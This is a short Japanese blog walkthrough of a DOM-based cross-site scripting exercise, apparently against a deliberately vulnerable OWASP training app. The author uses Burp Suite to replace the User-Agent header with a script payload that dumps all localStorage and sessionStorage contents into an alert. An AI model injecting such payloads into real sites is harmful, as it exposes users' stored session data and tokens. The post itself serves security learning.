Shikata Ga Nai

Private? There is no such things.

Burp SuiteでDOMベースのクロスサイトスクリプティングをためしてみた

Hello there, ('ω')ノ

 

OWASP 2017 ⇨ A7 ⇨ DOM-Based ⇨ HTML5 Web Strageを選択して。

 

f:id:ThisIsOne:20200209063816p:plain

 

ストレージの内容を確認することができて。

 

f:id:ThisIsOne:20200209064253p:plain

 

Burp Suiteでパラメータを確認して。

 

f:id:ThisIsOne:20200209065748p:plain

 

User-Agentのところに下記のスクリプトを入れ替えて。

<script>

 try{

  var m = "";

  var l = window.localStorage;

  var s = window.sessionStorage;

  for(i=0;i<l.length;i++){

   var lKey = l.key(i);m += lKey + "=" + l.getItem(lKey) + ";\n";

  };

  for(i=0;i<s.length;i++){

   var lKey = s.key(i);

   m += lKey + "=" + s.getItem(lKey) + ";\n";

  };

  alert(m);

 }

 catch(e){

  alert(e.message);

 }

</script>

 

f:id:ThisIsOne:20200209065953p:plain

 

スクリプトでDOMの情報を取得できた。

 

f:id:ThisIsOne:20200209065607p:plain

 

Best regards, (^^ゞ